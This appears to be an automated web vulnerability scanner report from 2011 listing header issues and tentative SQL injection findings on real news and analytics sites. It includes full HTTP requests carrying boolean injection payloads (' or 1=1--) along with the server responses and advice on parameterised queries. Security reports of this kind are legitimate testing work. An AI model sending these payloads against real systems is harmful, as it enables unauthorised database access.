29.70. http://uac.advertising.com/wrapper/aceUACping.htm

29.71. http://web.adblade.com/clicks.php

29.72. http://web.adblade.com/impsc.php

29.73. http://www.dnaindia.com/

29.74. http://www.dnaindia.com/comments_display_frame710.php

29.75. http://www.dnaindia.com/redirect

29.76. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791

29.77. http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811

29.78. http://www.dnaindia.com/world

29.79. http://www.mtv.com/news/articles/1670209/1991-pearl-jam-soundgarden-nirvana.jhtml/x26amp

29.80. http://www.mtv.com/news/articles/1670218/jennifer-lopez-american-idol.jhtml/x26amp

29.81. http://www.mtv.com/news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp

29.82. http://www.ndtv.com/news/redirect/url.php

29.83. http://www.ndtv.com/news/utils/new_ajax_gateway.php

29.84. http://www.networkadvertising.org/managing/opt_out.asp

29.85. http://www.networkadvertising.org/managing/optout_results.asp

29.86. http://www.taiwannews.com.tw/etn/news_content.php

29.87. http://www.tribalfusion.com/test/opt.js

29.88. http://yads.zedo.com/ads3/a

30. HTML uses unrecognised charset

30.1. http://truehits.net/stat.php

30.2. http://www.nationejobs.com/fulltime/displayposition_thai.php

30.3. http://www.scb.co.th/scb_api/api_a_deposit.jsp

30.4. http://www.scb.co.th/scb_api/scbapi.jsp

30.5. http://www.tmd.go.th/en/daily_forecast_forweb.php

30.6. http://www.tmd.go.th/en/province.php

31. Content type incorrectly stated

31.1. http://ad.doubleclick.net/clk

31.2. http://ads.indiatimes.com/ads.dll/genptypead

31.3. http://ads3.bangkokpost.co.th/www/delivery/spc.php

31.4. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH

31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH

31.6. http://api.tweetmeme.com/ajax/partial

31.7. http://api.tweetmeme.com/v2/follow.js

31.8. http://beacon.videoegg.com/abandoned

31.9. http://beacon.videoegg.com/admodelreceived

31.10. http://beacon.videoegg.com/adpo

31.11. http://beacon.videoegg.com/amcload

31.12. http://beacon.videoegg.com/coreloaded

31.13. http://beacon.videoegg.com/demo

31.14. http://beacon.videoegg.com/domloaded

31.15. http://beacon.videoegg.com/echo

31.16. http://beacon.videoegg.com/init

31.17. http://beacon.videoegg.com/initjs

31.18. http://beacon.videoegg.com/interact

31.19. http://beacon.videoegg.com/invpos

31.20. http://beacon.videoegg.com/pageloaded

31.21. http://beacon.videoegg.com/tload

31.22. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed

31.23. http://imp.fetchback.com/serve/fb/adtag.js

31.24. http://lvs.truehits.in.th/goggen.php

31.25. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr

31.26. http://media1.bangkokpost.com/common/img/bg/bg_directoryhome.jpg

31.27. http://media1.bangkokpost.com/common/img/bg/bg_popular_reader.jpg

31.28. http://msite.martiniadnetwork.com/index/

31.29. http://netspiderads2.indiatimes.com/ads.dll/getxmlad

31.30. http://rtb0.doubleverify.com/rtb.ashx/verifyc

31.31. http://social.ndtv.com/static/Comment/Form/

31.32. http://social.ndtv.com/static/Comment/List/

31.33. http://static.dnaindia.com/images/710/lead-dot-g.png

31.34. http://static.dnaindia.com/images/710/lead-dot-y.png

31.35. http://static.social.ndtv.com/plugins/index.php

31.36. http://timesofindia.indiatimes.com/logtopickeywords.cms

31.37. http://timesofindia.indiatimes.com/recommendedarticles.cms

31.38. http://timesofindia.indiatimes.com/toitopics_comjs_v3.cms

31.39. http://twitterapi.indiatimes.com/feedtweet/tweet

31.40. http://urls.api.twitter.com/1/urls/count.json

31.41. http://web.adblade.com/clicks.php

31.42. http://www.bangkokpost.com/_event.php

31.43. http://www.bangkokpost.com/_getContent_main.php

31.44. http://www.bangkokpost.com/common/js/extras_js.php

31.45. http://www.bangkokpost.com/favicon.ico

31.46. http://www.facebook.com/extern/login_status.php

31.47. http://www.google.com/buzz/api/button.js

31.48. http://www.google.com/search

31.49. http://www.ig.gmodules.com/gadgets/proxy/refresh=86400&container=ig&rewriteMime%3Dapplication%2Fx-shockwave-flash%26gadget%3Dhttp%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/landscapes/village/village.ywl

31.50. http://www.nationmultimedia.com/favicon.ico

31.51. http://www.nationmultimedia.com/home/banner/ad_set1.html

31.52. http://www.nationmultimedia.com/home/banner/weather.html

31.53. http://www.ndtv.com/news/utils/new_ajax_gateway.php

31.54. http://www.scb.co.th/favicon.ico

31.55. http://www.tribalfusion.com/test/opt.js

31.56. http://www9.effectivemeasure.net/v4/em_js

32. Content type is not specified

32.1. http://ads.bluelithium.com/st

32.2. http://vod.l3.cms.performgroup.com:443/open/1



1. SQL injection  next
There are 15 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://stat.synergy-e.com/piwik.php [site parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://stat.synergy-e.com
Path:   /piwik.php

Issue detail

The site parameter appears to be vulnerable to SQL injection attacks. The payloads 74761117'%20or%201%3d1--%20 and 74761117'%20or%201%3d2--%20 were each submitted in the site parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /piwik.php?action_name=Thai%20Politics%2C%20fuel%20prices%20in%20Thailand%2C%20Thaksin%2C%20Government%20policies%2C%20Gold%20price%2C%20Thailand%20travel%2C%20Thai%20government%2C%20Yingluck%20Shinawatra%2C%20thai%20Politics%2C%20About%20Thailand%2C%20Cambodia%20border%20dispute%2C%20germany%20case%2C%20parliament%2C%20TOT%203G%2C%20Thai%20election%20result%2C%20Thai-Cambodia%20border%20dispute%2C%20cabinet%20formation%2C%20Thailand%20politics%2C%20thai%20election%2C%20Pueathai%20cabinet%2C%20Cambodia%2C%20election%20result%20approval%2C%20Thaksin%20case%2C%20Abhisit%20resignation%2C%20Pueathai%20wins%2C%20cabinet%2C%20amnesty%2Cyingluck%20shinawatra%20%2C%20Abhisit%20resign%2C%20Thaksin%2C%20Thailand%20Democracy%2C%20Prime%20Minister%2C%20Thailand%20news%2C%20Thailand%20Election%20%2C%20thai%20government%2C%20Bangkok%20news%2C%20the%20nation%2C%20thailand%20travel%20%2CPattaya%20%2Cweather%20forecast%20%2C%20news%20the%20nation%2C%20Thai%20news%2C%20bangkok%20news%20-%20Nationmultimedia.com&site=www.nationmultimedia.com74761117'%20or%201%3d1--%20&idsite=&rec=1&r=040763&h=21&m=26&s=6&url=http%3A%2F%2Fwww.nationmultimedia.com%2F&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&_id=a4f1af5acb69be64&_idts=1315103167&_idvc=1&_idn=1&_refts=1315103167&_viewts=1315103167&_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: stat.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:32:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Access-Control-Allow-Origin: *
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

Request 2

GET /piwik.php?action_name=Thai%20Politics%2C%20fuel%20prices%20in%20Thailand%2C%20Thaksin%2C%20Government%20policies%2C%20Gold%20price%2C%20Thailand%20travel%2C%20Thai%20government%2C%20Yingluck%20Shinawatra%2C%20thai%20Politics%2C%20About%20Thailand%2C%20Cambodia%20border%20dispute%2C%20germany%20case%2C%20parliament%2C%20TOT%203G%2C%20Thai%20election%20result%2C%20Thai-Cambodia%20border%20dispute%2C%20cabinet%20formation%2C%20Thailand%20politics%2C%20thai%20election%2C%20Pueathai%20cabinet%2C%20Cambodia%2C%20election%20result%20approval%2C%20Thaksin%20case%2C%20Abhisit%20resignation%2C%20Pueathai%20wins%2C%20cabinet%2C%20amnesty%2Cyingluck%20shinawatra%20%2C%20Abhisit%20resign%2C%20Thaksin%2C%20Thailand%20Democracy%2C%20Prime%20Minister%2C%20Thailand%20news%2C%20Thailand%20Election%20%2C%20thai%20government%2C%20Bangkok%20news%2C%20the%20nation%2C%20thailand%20travel%20%2CPattaya%20%2Cweather%20forecast%20%2C%20news%20the%20nation%2C%20Thai%20news%2C%20bangkok%20news%20-%20Nationmultimedia.com&site=www.nationmultimedia.com74761117'%20or%201%3d2--%20&idsite=&rec=1&r=040763&h=21&m=26&s=6&url=http%3A%2F%2Fwww.nationmultimedia.com%2F&urlref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&_id=a4f1af5acb69be64&_idts=1315103167&_idvc=1&_idn=1&_refts=1315103167&_viewts=1315103167&_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews&pdf=1&qt=1&realp=0&wma=0&dir=0&fla=1&java=1&gears=0&ag=1&res=1920x1200&cookie=1 HTTP/1.1
Host: stat.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:32:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Content-Length: 867
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>&rsaquo; Error</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="plugins/CoreHome/templates/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="themes/default/simple_structure.css" />
</head>
<body>
<div id="content">
   <div id="title"><img title='UnitusX' alt="UnitusX" src='themes/default/images/logo-header.png' style='margin-left:10px' /><span id="subh1"> # <a href='http://piwik.org/'>web analytics</a></span></div>
<p>Invalid idSite</p><p>Edit the following line in piwik.php to enable tracker debugging and display a backtrace:</p>
                   <blockquote><pre>$GLOBALS['PIWIK_TRACKER_DEBUG'] = true;</pre></blockquote></div>
</body>
</html>

1.2. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15566219'%20or%201%3d1--%20 and 15566219'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news15566219'%20or%201%3d1--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:45 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news15566219' or 1=1-- /index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news15566219'%20or%201%3d2--%20/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 22
Date: Sun, 04 Sep 2011 04:40:14 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.3. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21868853'%20or%201%3d1--%20 and 21868853'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm21868853'%20or%201%3d1--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm21868853' or 1=1-- /x26amp
on this server.</p>
</body></html>

Request 2

GET /news/index.htm21868853'%20or%201%3d2--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 30
Date: Sun, 04 Sep 2011 04:40:22 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.4. http://www.mid-day.com/news/index.htm/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20529597'%20or%201%3d1--%20 and 20529597'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm/x26amp20529597'%20or%201%3d1--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm/x26amp20529597' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /news/index.htm/x26amp20529597'%20or%201%3d2--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />


<style type="text/css">
#polliframe {height: 250px;}
#masthead .mm1 {color:#fff; background-colo
...[SNIP]...

1.5. http://www.mid-day.com/news/index.htm/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10092521%20or%201%3d1--%20 and 10092521%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/index.htm/x26amp?110092521%20or%201%3d1--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 223
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/index.htm/x26amp?110092521%20or%201%3d2--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, International News, Foreign Stories, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of news from MiD DAY, the latest happenings from All around the globe and Mumbai, Bangalore, Delhi, Pune and the rest of India. Read the latest Mumbai News, Mumbai City News, Bangalore City News, latest Bangalore News, Delhi City News, latest Delhi News, Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="International News, Foreign Stories, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore, bombay, new delhi">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />


<style type="text/css">
#polliframe {height: 250px;}
#masthead .mm1 {color:#fff; background-colo
...[SNIP]...

1.6. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20746183'%20or%201%3d1--%20 and 20746183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news20746183'%20or%201%3d1--%20/local/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news20746183' or 1=1-- /local/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news20746183'%20or%201%3d2--%20/local/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 13
Date: Sun, 04 Sep 2011 04:40:05 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
